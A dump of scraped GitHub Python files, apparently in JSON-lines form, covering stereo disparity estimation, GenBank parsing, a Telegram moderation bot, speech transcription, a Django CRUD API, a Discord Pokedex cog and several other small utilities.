template_c[0] - int(template_width_small * 0.5)\n template_small = pre_frame_img[top_small:top_small + template_height_small, left_small:left_small + template_width_small]\n\n finer_range = int(template_height/6) + int(template_width_small * 0.5)\n ev_epi_img_small = ev_img[top_small:top_small+template_height_small,e_max_x-finer_range:e_max_x+finer_range] # top down left right\n # cv2.imshow('ev_epi_img_small',ev_epi_img_small)\n\n epi_result_small = cv2.matchTemplate(ev_epi_img_small, template_small, cv2.TM_CCOEFF_NORMED) # shape (1,621)\n _, max_val_small, _, max_loc_small = cv2.minMaxLoc(epi_result_small)\n e_max_x_small = e_max_x-finer_range + int(template_width_small * 0.5) + max_loc_small[0] # left + half_template + max\n # print(\"e_max_x\",e_max_x,'e_max_x_small',e_max_x_small)\n\n # #debug\n # ev_img_color = cv2.cvtColor(ev_img, cv2.COLOR_GRAY2BGR)\n # cv2.circle(ev_img_color,([e_max_x_small,template_c[1]]),2,(0,255,255),-1)\n # cv2.rectangle(ev_img_color, (e_max_x_small-int(template_width_small * 0.5),top_small), (e_max_x_small + int(template_width_small * 0.5),top_small + template_height_small), (0,255,255), 1) # yellow\n # # cv2.imshow('ev_img_find1',ev_img_color)\n\n # # color_frame_patch = cv2.cvtColor(pre_frame_img, cv2.COLOR_GRAY2BGR)\n # cv2.rectangle(color_frame_patch, (left_small, top_small), (left_small + template_width_small, top_small + template_height_small),(0,0,255), 1) # red\n # # cv2.imshow('color_frame_patch1',color_frame_patch)\n # cv2.imshow('combine',cv2.hconcat([color_frame_patch,ev_img_color]))\n\n # k = cv2.waitKey(0)\n # if k == 27: # ESC\n # cv2.destroyAllWindows() \n\n disp2 = template_c[0] - e_max_x_small\n # print('disp',disp,'disp2',disp2)\n\n if disp2 < 0 or disp2 > 100 : # TODO need to fill in the hole\n # if max_val < 0.45 or disp < 0 or disp > 100 :\n disp2 = 0\n test_wr_num = test_wr_num+1\n\n disparity_map[y,x] = disp2\n\n print('step_num',step_num,'wrong_num',wrong_num,'disp < 0 or disp > 100',test_wr_num)\n disparity_map_uint8 = np.uint8(disparity_map)\n cv2.imwrite(save_path + '/' + 'origin_disparitymap_tsukuba' + '.png',disparity_map_uint8) \n\n return disparity_map # ? 0-255 cause fault unit8\n\nif __name__ == '__main__':\n save_path = '/Users/cainan/Desktop/Project/data/processed/disparity'\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n '''\n LOAD DATA\n '''\n pre_frame_img, ev_img = load_data()\n\n '''\n processing \n '''\n disparity_map = compute_pyramid_NCC(pre_frame_img,ev_img)\n disp_norm = img_normalization(disparity_map) \n\n # medianblur_disp = cv2.medianBlur(disparity_map,3)\n # disp_norm = img_normalization(medianblur_disp) \n \n cv2.imshow(\"disp_norm\",disp_norm)\n \n k = cv2.waitKey(0)\n if k == 27: # ESC\n cv2.imwrite(save_path + '/' + 'pyramid230_tsukuba' + '.png',disp_norm)\n cv2.destroyAllWindows() \n\n\n\n\n\n\n\n\n","repo_name":"NannCai/Stereo_Disparity_Estimation","sub_path":"draft/disparity_pyramid_tsukuba.py","file_name":"disparity_pyramid_tsukuba.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"34867986664","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# AF - last modification: August 10th 2018\n# Script name : gene_position_gb_extraction.py\n#\n# Description : this script take a genbank file as input file and extract the\n# virus accession number, the genome size and the start_N_end\n# positions of all genes and store these data in a json file.\n#\n# IMPORTANT_TO_NOTE : * The second to last part of this script has specifically\n# been written to work with Coronaviruses genome. You may\n# want to comment this part in order use the script for\n# other virus genome\n#\n################################################################################\n\n# ~ start script ~ #\n\n##############\n### Modules ##\n##############\n\nimport re\nimport json\nimport argparse\nimport sys\n\n###############\n## Functions ##\n###############\n\ndef get_min(dico):\n min_list = []\n for key in dico:\n if key != \"genomesize\" and key != \"virus_id\":\n min_list.append(dico[key][0])\n return min(min_list)\n\ndef get_max(dico):\n max_list = []\n for key in dico:\n if key != \"genomesize\" and key != \"virus_id\":\n max_list.append(dico[key][1])\n return max(max_list)\n\n#################\n## Main Script ##\n#################\n\n\n## call for the command line arguments ##\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help = \"the gb file you want to parse\",\\\n type = str)\nparser.add_argument(\"-o\", \"--output\", help = \"the output file to create\",\\\n type = str)\nparser.add_argument(\"-a\", \"--virus_acronym\", help = \"write the virus acronym\",\\\n type = str)\n\narg = parser.parse_args()\n\n## check for the presence of all command line arguements ##\nif not arg.input or not arg.output or not arg.virus_acronym:\n parser.print_help()\n sys.exit(\"\\nAn error occured while entering the arguments.\\n\\\nAll three arguments are necessary, please read the help section above.\\n\")\n\n\n## call for a dictionnary to store data ##\ndico = {}\n\n## opening and reading the genbank file ##\nwith open(arg.input,\"r\") as filein:\n line = filein.readline()\n regex1 = re.compile('^LOCUS {7}[A-Z0-9_]+ +([0-9]+)')\n regex1bis = re.compile('^VERSION {5}([A-Z0-9_\\.]+)')\n # match à la première ligne du fichier\n r = regex1.search(line)\n dico[\"genomesize\"] = int(r.group(1))\n\n # get the accession number of the sequence associated with its version\n for line_bis in filein:\n if \"VERSION\" in line_bis:\n r_bis = regex1bis.search(line_bis)\n dico[\"virus_id\"] = arg.virus_acronym + \"_\" + r_bis.group(1)\n break\n\n # because we are not interested by the head section anymore, we escape it\n # using the following while loop\n while \"FEATURES\" not in line:\n line = filein.readline()\n\n regex2 = \\\nre.compile('^\\ {5}CDS\\ {13}join\\(([0-9]+)\\.{2}[0-9]+,[0-9]+\\.{2}([0-9]+)\\)')\n # match lines with 'CDS' and 'join', for the fragmented genes\n\n regex3 = re.compile('^\\ {5}CDS\\ {13}([0-9]+)\\.{2}([0-9]+)')\n # match lines with 'CDS' for the unfragmented genes\n\n regex4 = re.compile('^\\ {21}/product=[\\\"\\']([A-Za-z0-9 -_]+)[\\\"\\']')\n # match lines with '/product' to recover the product name of the gene\n\n flag = False # set a flag to make my life easier\n\n while \"ORIGIN\" not in line:\n\n if flag == True:# this is set \"ON\" when a CDS has previously been found\n\n if regex4.match(line):# look for the product name of the gene\n r = regex4.search(line)\n product_id = r.group(1)\n dico[product_id] = geneposition\n flag = False # set \"OFF\", in order to look for another gene\n line = filein.readline()\n\n else:\n line = filein.readline()\n\n elif regex2.match(line): # look fragmented genes\n r = regex2.search(line)\n geneposition = [ int(r.group(1)) , int(r.group(2)) ]\n flag = True\n line = filein.readline()\n\n elif regex3.match(line): # look for unfragmented genes\n r = regex3.search(line)\n geneposition = [ int(r.group(1)) , int(r.group(2)) ]\n flag = True\n line = filein.readline()\n\n else:\n line = filein.readline()\n\n\n## add UTR's region to dictionnary ##\ndico[\"UTR5\"] = [1,get_min(dico)-1]\ndico[\"UTR3\"] = [get_max(dico)+1, dico[\"genomesize\"]]\n\n## writting the data into a json file ##\n\nfilout = open(arg.output,\"w\",encoding = 'utf-8')\njson.dump(dico, filout, ensure_ascii = False)\nfilout.close()\n\n# ~ end of script ~ #\n","repo_name":"ALFLAG/Viral_Variant_Visualiser","sub_path":"SCRIPTS_PYTHON/extract_gene_position_from_gb_file.py","file_name":"extract_gene_position_from_gb_file.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"}
+{"seq_id":"15222109665","text":"import telebot\nfrom telebot import types\n\n# Configurações do bot\nTOKEN = 'SEU_TOKEN_AQUI'\nbot = telebot.TeleBot(TOKEN)\n\n# Lista de IDs de administradores do grupo\nadmins = [123456789, 987654321] # Substitua pelos IDs reais dos administradores\n\n# Comando /start\n@bot.message_handler(commands=['start'])\ndef start(message):\n bot.send_message(message.chat.id, \"Olá! Eu sou o bot moderador. Apenas administradores podem usar meus comandos.\")\n\n# Comando /ban\n@bot.message_handler(commands=['ban'])\ndef ban_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.ban_chat_member(message.chat.id, user_id)\n else:\n bot.reply_to(message, \"Você não tem permissão para banir membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /warn\n@bot.message_handler(commands=['warn'])\ndef warn_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.send_message(message.chat.id, f\"Usuário {user_id} foi advertido.\")\n else:\n bot.reply_to(message, \"Você não tem permissão para advertir membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /kick\n@bot.message_handler(commands=['kick'])\ndef kick_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.kick_chat_member(message.chat.id, user_id)\n else:\n bot.reply_to(message, \"Você não tem permissão para expulsar membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /mute\n@bot.message_handler(commands=['mute'])\ndef mute_member(message):\n user_id = get_mentioned_user_id(message)\n if user_id:\n if is_admin(message.from_user.id):\n bot.restrict_chat_member(message.chat.id, user_id, until_date=None, can_send_messages=False)\n else:\n bot.reply_to(message, \"Você não tem permissão para silenciar membros.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Comando /del\n@bot.message_handler(commands=['del'])\ndef delete_message(message):\n if is_admin(message.from_user.id):\n user_id = get_mentioned_user_id(message)\n if user_id:\n bot.delete_message(message.chat.id, message.message_id)\n else:\n bot.reply_to(message, \"Você precisa mencionar o usuário cuja mensagem deseja apagar.\")\n else:\n bot.delete_message(message.chat.id, message.message_id)\n\n# Verifica se o remetente da mensagem é um administrador\ndef is_admin(user_id):\n return user_id in admins\n\n# Obtém o ID do usuário mencionado na mensagem\ndef get_mentioned_user_id(message):\n user_id = None\n if message.reply_to_message:\n user_id = message.reply_to_message.from_user.id\n elif message.entities:\n for entity in message.entities:\n if entity.type == 'text_mention':\n user_id = entity.user.id\n return user_id\n\nif __name__ == '__main__':\n bot.polling()\n","repo_name":"VILHALVA/CURSO-DE-TELEGRAM-BOT","sub_path":"MODULO 4/14) VIA COMANDOS/MODERADOR.py","file_name":"MODERADOR.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"}
+{"seq_id":"9077452878","text":"import os\nfrom faster_whisper import WhisperModel\nimport numpy as np\nimport sounddevice as sd\nimport soundfile as sf\nfrom colorama import Fore, Style\nfrom typing import Optional, Tuple, Callable\nfrom scipy.io import wavfile\nimport io\n\n# SETTINGS\nMODEL_PATH: str = f\"whisper-base.en/\"\nENGLISH_ONLY: bool = True # English only model\nECHO: bool = False # Hear your own voice for debugging\nINPUT_DEVICE: Optional[Tuple[int, int]] = None# (4, 4) # [Input_ID, Output_ID] You can check this with sd.query_devices()\nFREQ_RANGE: Tuple[int, int] = (50, 1000) # Frequency to detect valid sounds \nSAMPLE_RATE: int = 44100 # Stream device recording frequency\nBLOCK_SIZE: int = 30 # Block size in milliseconds\nTHRESHOLD: float = 0.1 # Minimum volume threshold to activate listening\nEND_BLOCKS: int = 30 # Wait block for Whisper\n\n\n# CONSTANTS\nNP_ZEROS = np.zeros((0, 1))\n\n# Create a fake assistant if listener is being ran as main for testing\nclass fakeAssistant(): \n running: bool = True\n talking: bool = False\n analyze: Optional[Callable] = None\n\nclass StreamHandler:\n def __init__(self, assistant=fakeAssistant()):\n self.assistant = assistant\n self.padding: int = 0\n self.running: bool = True\n self.audio_ready: bool = False\n self.buffer: np.ndarray = NP_ZEROS\n self.prev_block: np.ndarray = NP_ZEROS\n self.audio: np.ndarray = NP_ZEROS\n sd.default.device = INPUT_DEVICE or sd.default.device # type: ignore\n print(f\"Using Audio Device: {Style.BRIGHT}{Fore.GREEN}{sd.default.device}\")\n self.model: WhisperModel = WhisperModel(MODEL_PATH, device=\"cpu\", compute_type=\"int8\")\n print(Style.BRIGHT + Fore.BLUE + \"Loaded Model\" + Style.RESET_ALL)\n\n\n def callback(self, indata: np.ndarray, frames: int, time, status: sd.CallbackFlags) -> None:\n if not any(indata):\n raise Exception(Style.BRIGHT + Fore.RED + \"No Input Recieved. Is your 'INPUT_DEVICE' Correct?\" + Style.RESET_ALL)\n \n if indata.max() > THRESHOLD and not self.assistant.talking:\n if self.padding < 1: self.buffer = self.prev_block.copy()\n self.buffer = np.concatenate((self.buffer, indata))\n self.padding = END_BLOCKS\n else:\n self.padding -= 1\n if self.padding > 1:\n self.buffer = np.concatenate((self.buffer, indata))\n \n elif self.padding < 1 < self.buffer.shape[0] > SAMPLE_RATE: # If enough silence has passed, write to file\n if ECHO:\n self.assistant.talking = True\n sd.play(self.buffer, SAMPLE_RATE)\n sd.wait()\n self.assistant.talking = False\n \n # wavfile.write(\"dictate.wav\", SAMPLE_RATE, self.buffer)\n self.audio = self.buffer.copy();\n self.buffer = NP_ZEROS\n self.audio_ready = True\n \n elif self.padding < 1 < self.buffer.shape[0] < SAMPLE_RATE:\n self.buffer = NP_ZEROS\n else:\n self.prev_block = indata.copy()\n\n\n def process(self):\n if self.audio_ready:\n # Convert audio to io file\n # import time;\n # init_time = time.time()\n\n bytes_wav = bytes()\n bytes_io = io.BytesIO(bytes_wav)\n wavfile.write(bytes_io, rate=SAMPLE_RATE, data=self.audio)\n\n # print(self.audio)\n segments, info = self.model.transcribe(bytes_io, language=\"en\", beam_size=3)\n result: str = \"\".join(x.text for x in segments)\n # print(time.time() - init_time)\n print(f\"{Style.BRIGHT}{Fore.BLUE}Recieved Result:{Style.RESET_ALL} {result}\")\n if self.assistant.analyze is not None: self.assistant.analyze(result)\n self.audio_ready = False\n\n\n def listen(self) -> None:\n print(Style.BRIGHT + Fore.GREEN + \"Listening\" + Style.RESET_ALL)\n with sd.InputStream(channels=1, callback=self.callback, blocksize=int(SAMPLE_RATE * BLOCK_SIZE / 1000), samplerate=SAMPLE_RATE):\n while self.running and self.assistant.running: self.process();\n\ndef main():\n try:\n handler = StreamHandler()\n handler.listen()\n except (KeyboardInterrupt, SystemExit): pass\n finally:\n if os.path.exists(\"dictate.wav\"): os.remove(\"dictate.wav\");\n print(\"Exited Program\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"royce-mathew/Adam","sub_path":"src/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"33452866358","text":"import json\n\nfrom sports_bettors.api import api\n\n\ndef _parse_inputs(inputs: dict) -> dict:\n # Required fields\n league = {'College Football': 'college_football', 'NFL': 'nfl'}.get(inputs['league'])\n required = {\n 'league': league,\n 'random_effect': inputs['random_effect'],\n 'feature_set': inputs['feature_set']\n }\n\n # Feature values for conditions (must include RandomEffect)\n options = [json.loads(input_) for input_ in inputs.getlist('inputs[]')]\n options = {item['name']: item['value'] for item in options}\n\n required['inputs'] = {k: float(v) for k, v in options.items() if k != 'RandomEffect'}\n required['inputs'].update({'RandomEffect': options['RandomEffect']})\n\n return required\n\n\ndef _parse_outputs(output: dict) -> dict:\n \"\"\"\n We are fixing the random effect and feature set, so only need the response key of sb-output\n \"\"\"\n return {k[2]: v for k, v in output.items()}\n\n\ndef sb_api(inputs: dict):\n # Parse inputs\n inputs = _parse_inputs(inputs)\n\n # Get betting probabilities\n output = api(**inputs)\n\n return _parse_outputs(output)\n","repo_name":"spwhite1337/website","sub_path":"backend/apis/utils/sports_bettors/sports_bettors.py","file_name":"sports_bettors.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"13466397702","text":"from PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtCore import Slot\n\nfrom sidegrip import CSizeGrip, SideGrip\nfrom note_contents import noteContents\nimport db\n\n\nclass noteWindow(QtWidgets.QMainWindow):\n def __init__(self, obj=None):\n super().__init__()\n\n self.resize(360, 360)\n self.setMinimumSize(90, 90)\n self.setWindowOpacity(0.9)\n self.setWindowFlags(self.windowFlags() | QtCore.Qt.FramelessWindowHint)\n\n self.sideGrips = None\n self.cornerGrips = None\n self.setGrips()\n\n self._prev_pos = None\n self._drag_active = False\n\n p = QtGui.QPalette()\n p.setColor(QtGui.QPalette.Window, QtGui.QColor(48, 48, 48))\n self.setPalette(p)\n\n f = noteContents(parent=self)\n self.setCentralWidget(f)\n self.centralWidget()\n\n self.show()\n self.raise_()\n\n if obj:\n self.obj = obj\n self.load()\n else:\n self.obj = db.Note()\n self.save()\n\n _gripSize = 8\n\n @property\n def gripSize(self):\n return self._gripSize\n\n def setGrips(self):\n self.sideGrips = [\n SideGrip(self, QtCore.Qt.LeftEdge),\n SideGrip(self, QtCore.Qt.TopEdge),\n SideGrip(self, QtCore.Qt.RightEdge),\n SideGrip(self, QtCore.Qt.BottomEdge),\n ]\n\n self.cornerGrips = []\n for _ in range(4):\n g = CSizeGrip(self)\n self.cornerGrips.append(g)\n\n def setGripSize(self, size):\n if size == self._gripSize:\n return\n self._gripSize = max(2, size)\n self.updateGrips()\n\n def updateGrips(self):\n self.setContentsMargins(*[self.gripSize] * 4)\n\n out_rect = self.rect()\n # an \"inner\" rect used for reference to set the geometries of size grips\n in_rect = out_rect.adjusted(self.gripSize, self.gripSize, -self.gripSize, -self.gripSize)\n\n # top left corner\n self.cornerGrips[0].setGeometry(\n QtCore.QRect(out_rect.topLeft(), in_rect.topLeft()))\n # top right corner\n self.cornerGrips[1].setGeometry(\n QtCore.QRect(out_rect.topRight(), in_rect.topRight()).normalized())\n # bottom right corner\n self.cornerGrips[2].setGeometry(\n QtCore.QRect(in_rect.bottomRight(), out_rect.bottomRight()))\n # bottom left corner\n self.cornerGrips[3].setGeometry(\n QtCore.QRect(out_rect.bottomLeft(), in_rect.bottomLeft()).normalized())\n\n # left edge\n self.sideGrips[0].setGeometry(\n 0, in_rect.top(), self.gripSize, in_rect.height())\n # top edge\n self.sideGrips[1].setGeometry(\n in_rect.left(), 0, in_rect.width(), self.gripSize)\n # right edge\n self.sideGrips[2].setGeometry(\n in_rect.left() + in_rect.width(),\n in_rect.top(), self.gripSize, in_rect.height())\n # bottom edge\n self.sideGrips[3].setGeometry(\n self.gripSize, in_rect.top() + in_rect.height(),\n in_rect.width(), self.gripSize)\n\n def load(self):\n self.move(self.obj.x, self.obj.y)\n self.resize(self.obj.w, self.obj.h)\n QtWidgets.QApplication.instance().activeNotes[self.obj.id] = self\n\n def save(self):\n self.obj.x = self.x()\n self.obj.y = self.y()\n self.obj.w = self.width()\n self.obj.h = self.height()\n db.session.add(self.obj)\n db.session.commit()\n print(self.obj)\n QtWidgets.QApplication.instance().activeNotes[self.obj.id] = self\n\n @Slot()\n def delete(self):\n db.session.delete(self.obj)\n db.session.commit()\n self.close()\n\n def resizeEvent(self, event):\n QtWidgets.QMainWindow.resizeEvent(self, event)\n self.updateGrips()\n\n def mousePressEvent(self, e):\n self._prev_pos = e.globalPosition().toPoint()\n self.setCursor(QtCore.Qt.ClosedHandCursor)\n\n def mouseMoveEvent(self, e):\n delta = e.globalPosition().toPoint() - self._prev_pos\n self.move(self.x() + delta.x(), self.y() + delta.y())\n self._prev_pos = e.globalPosition().toPoint()\n\n self._drag_active = True\n\n def mouseReleaseEvent(self, e):\n if self._drag_active:\n self.save()\n self._prev_pos = None\n self._drag_active = False\n self.setCursor(QtCore.Qt.ArrowCursor)\n","repo_name":"colin-m-davis/stuck","sub_path":"note_window.py","file_name":"note_window.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"6217272624","text":"def text_processor(title,content):\n relevant=0\n severity=0\n deaths=0\n tamadas=[u'támad',u'sebes']\n for i in tamadas:\n if i in title+content:\n relevant=1\n severity=3\n tamadas=[u'halál',u'áldozat',u'ölt ',u'pusztít']\n for i in tamadas:\n if i in title+content:\n relevant=1\n severity=4\n tamadas=[u'medve',u'medvé']\n for i in tamadas:\n if i in title.replace(',',' ').replace('.',' ').lower():\n relevant=1\n for i in tamadas:\n if (u'medv' or u'nagyvad') not in title+content:\n relevant=-1\n tamadas=[u'medvegyev',u'medveczky',u'jegesmedvék',u'medvehagyma',u'aranymedve',u'szibéria',u' kupa',\n u'jégkorong',u'kosárlabda',u'labdarúgás',u'labdarúgó',u'steaua',\n u'c osztály',u'berlin',u'állatkert',u'medve-tó',u'oroszorsz',u' orosz ']\n for i in tamadas:\n if i in (title+content).replace(',',' ').replace('.',' ').lower():\n relevant=-1\n return relevant,severity,deaths","repo_name":"szekelydata/medveterkep","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"1420755151","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom app.models import Student\nfrom .serializers import studentSerializer\n\n\n\n# @api_view(['GET'])\n# def getRoutes(request):\n# routes = [\n# 'GET /api',\n# 'GET /api/students',\n# 'GET /api/students/:id',\n# 'POST/api/create'\n# ]\n# return Response(routes) \n\n\n@api_view(['GET'])\ndef getStudents(request):\n students = Student.objects.all()\n serializer = studentSerializer(students, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef getStudent(request,pk):\n student = Student.objects.get(id=pk)\n serializer = studentSerializer(student, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef createStudent(request): \n serializer = studentSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef updateStudent(request,pk): \n\n student = Student.objects.get(student_id=pk)\n serializer = studentSerializer(instance=student,data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef deleteStudent(request,pk):\n student = Student.objects.get(student_id=pk)\n student.delete()\n return Response(\"You've deleted successfully!\")","repo_name":"hagonin/CRUD-Django-app","sub_path":"cruddjango/app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"25604484610","text":"import io\nimport json\nimport oci\nfrom fdk import response\n\ndef publish_notification(topic_id, msg_title, msg_body):\n signer = oci.auth.signers.get_resource_principals_signer()\n client = oci.ons.NotificationDataPlaneClient({}, signer = signer)\n msg = oci.ons.models.MessageDetails(title = msg_title, body = msg_body)\n print(msg, flush=True)\n client.publish_message(topic_id, msg)\n\ndef handler(ctx, data: io.BytesIO=None):\n try:\n body = json.loads(data.getvalue())\n topic_id = body[\"topic_id\"]\n msg_title = body[\"msg_title\"]\n msg_body = body[\"msg_body\"]\n print(\"topic_id: \" + body[\"topic_id\"], flush=True)\n print(\"msg_title: \" + body[\"msg_title\"], flush=True)\n print(\"msg_body: \" + body[\"msg_body\"], flush=True)\n except Exception as ex:\n print(\"Three arguments need to be passed to the function, topic_id, msg_title and msg_body\", ex, flush=True)\n raise\n publish_notification(topic_id, msg_title, msg_body)\n return response.Response(ctx,\n response_data={\"response\":\"email sent\"},\n headers={\"Content-Type\": \"application/json\"}\n )","repo_name":"oracle-samples/oracle-functions-samples","sub_path":"samples/oci-ons-publish-python/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"8"}
+{"seq_id":"35703245112","text":"import sys\r\nfrom discord.ext import commands\r\nimport discord\r\nimport cogs.load_json\r\n\r\nclass Pokedex():\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command(pass_context = True)\r\n async def pokedex(self,ctx, *, pkmn_name : str):\r\n \"\"\"Get the stats of a Pokemon!\"\"\"\r\n pkmn_name = pkmn_name.lower()\r\n\r\n try:\r\n data = cogs.load_json.get_poke_info()\r\n data_bool = True\r\n except:\r\n data_bool = False\r\n\r\n if pkmn_name[0:4] == \"tapu\":\r\n poke_ico_name_set = True\r\n if pkmn_name[5:] == \"koko\":\r\n poke_ico_name = \"tapu_koko\"\r\n pkmn_name = \"tapukoko\"\r\n elif pkmn_name[5:] == \"bulu\":\r\n poke_ico_name = \"tapu_bulu\"\r\n pkmn_name = \"tapubulu\"\r\n elif pkmn_name[5:] == \"fini\":\r\n poke_ico_name = \"tapu_fini\"\r\n pkmn_name = \"tapufini\"\r\n elif pkmn_name[5:] == \"lele\":\r\n poke_ico_name = \"tapu_lele\"\r\n pkmn_name = \"tapulele\"\r\n else:\r\n poke_ico_name_set = False\r\n\r\n if pkmn_name[0:4] == \"type\":\r\n poke_ico_name_set = True\r\n poke_ico_name = \"type_null\"\r\n pkmn_name = \"typenull\"\r\n \r\n pkmn_name_capt = pkmn_name.title()\r\n try:\r\n subdata = data[pkmn_name]\r\n except:\r\n await self.bot.say(\"The pokemon you searched for doesn't exist or you may have wrongly spelt the name.\")\r\n return 0\r\n\r\n type_one = subdata['types'][0]\r\n type_one = type_one.title()\r\n\r\n ability_prim = subdata['abilities']['primary']\r\n ability_prim = ability_prim.title()\r\n\r\n try:\r\n ability_hidden = subdata['abilities']['hidden']\r\n ability_hidden = ability_hidden.title()\r\n ability_final = \"Hidden : \" + ability_hidden + \"\\n\" + \"Primary : \" + ability_prim\r\n except:\r\n ability_hidden = \"No Hidden Ability\"\r\n ability_final = \"Hidden : \" + ability_hidden + \"\\n\" + \"Primary : \" + ability_prim\r\n \r\n try:\r\n type_two = subdata['types'][1]\r\n type_two = type_two.title()\r\n type_final = type_one + ', ' + type_two\r\n\r\n except:\r\n type_final = type_one\r\n pass\r\n if not poke_ico_name_set:\r\n poke_ico_name = pkmn_name.lower()\r\n poke_ico_name = poke_ico_name.replace(\" \", \"_\")\r\n poke_ico_url = \"http://smogon.com/dex/media/sprites/xy/\" + poke_ico_name + \".gif\"\r\n send_data = discord.Embed(title=pkmn_name_capt, description='***Information***', colour=0x4499E7)\r\n send_data.set_image(url=poke_ico_url)\r\n send_data.set_author(name='Pokedex', icon_url=poke_ico_url)\r\n send_data.add_field(name=\"Attack\", value=subdata['stats']['atk'], inline=True)\r\n send_data.add_field(name=\"Special Attack\", value=subdata['stats']['spa'], inline=True)\r\n send_data.add_field(name=\"Defense\", value=subdata['stats']['def'], inline=True)\r\n send_data.add_field(name=\"Special Defense\", value=subdata['stats']['spd'], inline=True)\r\n send_data.add_field(name=\"HP\", value=subdata['stats']['hp'], inline=True)\r\n send_data.add_field(name=\"Speed\", value=subdata['stats']['spe'], inline=True)\r\n send_data.add_field(name=\"Types\", value=type_final, inline=True)\r\n send_data.add_field(name=\"Abilities\", value=ability_final, inline=True)\r\n send_data.add_field(name=\"Base Experience\", value=subdata['base_exp'], inline=True)\r\n send_data.add_field(name=\"Base Friendship\", value=subdata['base_friendship'], inline=True)\r\n await self.bot.say(embed=send_data)\r\n \r\ndef setup(bot):\r\n bot.add_cog(Pokedex(bot))","repo_name":"The-Real-Ketchum-Dev/Silent-Trainer-Bot","sub_path":"cogs/pokedex.py","file_name":"pokedex.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"14732672158","text":"import logging\n\nfrom base64 import urlsafe_b64encode, urlsafe_b64decode\nfrom urllib.parse import urlencode, urlunparse, urlparse, parse_qs\nfrom zlib import compress, decompress\nfrom zlib import error as ZlibErr\nfrom binascii import Error as BinasciiErr\n\n\ndef url_encode(params: dict) -> str:\n \"\"\"Encode the URL parameters and zip them and create the whole URL using\n given data.\n\n :param params: All data necessary to create the URL:\n - scheme,\n - network location,\n - path,\n - query,\n - parameters.\n :type params: dict\n :returns: Encoded URL.\n :rtype: str\n \"\"\"\n\n url_params = params.get(\"params\", None)\n if url_params:\n encoded_params = urlsafe_b64encode(\n compress(urlencode(url_params).encode(\"utf-8\"), level=9)\n ).rstrip(b\"=\").decode(\"utf-8\")\n else:\n encoded_params = str()\n\n return urlunparse((\n params.get(\"scheme\", \"http\"),\n params.get(\"netloc\", str()),\n params.get(\"path\", str()),\n str(), # params\n params.get(\"query\", str()),\n encoded_params\n ))\n\n\ndef url_decode(url: str) -> dict:\n \"\"\"Parse the given URL and decode the parameters.\n\n :param url: URL to be parsed and decoded.\n :type url: str\n :returns: Paresed URL.\n :rtype: dict\n \"\"\"\n\n try:\n parsed_url = urlparse(url)\n except ValueError as err:\n logging.warning(f\"\\nThe url {url} is not valid, ignoring.\\n{repr(err)}\")\n return dict()\n\n if parsed_url.fragment:\n try:\n padding = b\"=\" * (4 - (len(parsed_url.fragment) % 4))\n params = parse_qs(decompress(\n urlsafe_b64decode(\n (parsed_url.fragment.encode(\"utf-8\") + padding)\n )).decode(\"utf-8\")\n )\n except (BinasciiErr, UnicodeDecodeError, ZlibErr) as err:\n logging.warning(\n f\"\\nNot possible to decode the parameters from url: {url}\"\n f\"\\nEncoded parameters: '{parsed_url.fragment}'\"\n f\"\\n{repr(err)}\"\n )\n return dict()\n else:\n params = None\n\n return {\n \"scheme\": parsed_url.scheme,\n \"netloc\": parsed_url.netloc,\n \"path\": parsed_url.path,\n \"query\": parsed_url.query,\n \"fragment\": parsed_url.fragment,\n \"params\": params\n }\n","repo_name":"FDio/csit","sub_path":"csit.infra.dash/app/cdash/utils/url_processing.py","file_name":"url_processing.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"8"}
